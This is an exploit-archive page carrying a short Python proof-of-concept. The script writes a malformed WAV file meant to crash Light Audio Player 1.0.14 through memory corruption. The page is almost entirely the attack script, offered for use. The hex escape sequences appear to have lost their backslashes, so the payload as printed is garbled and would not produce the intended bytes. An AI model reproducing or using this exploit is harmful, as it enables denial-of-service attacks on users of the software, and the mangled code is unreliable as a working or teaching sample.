Home / exploits Light Audio Player 1.0.14 Memory Corruption
Posted on 25 March 2014
#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC #[+] Date: 22-03-2014 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html #[+] Friendly Sites: na3il.com,th3-creative.com #[+] Twitter: @TCYB3R import os os.system("color 02") print"###########################################################" print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #" print"# Author: TUNISIAN CYBER #" print"# Category: DoS/PoC # " print"###########################################################" header=("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01" "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E" "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22" "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00") filename = "3vil.wav" file = open(filename , "w") file.write(header) print " Files Created! " file.close()
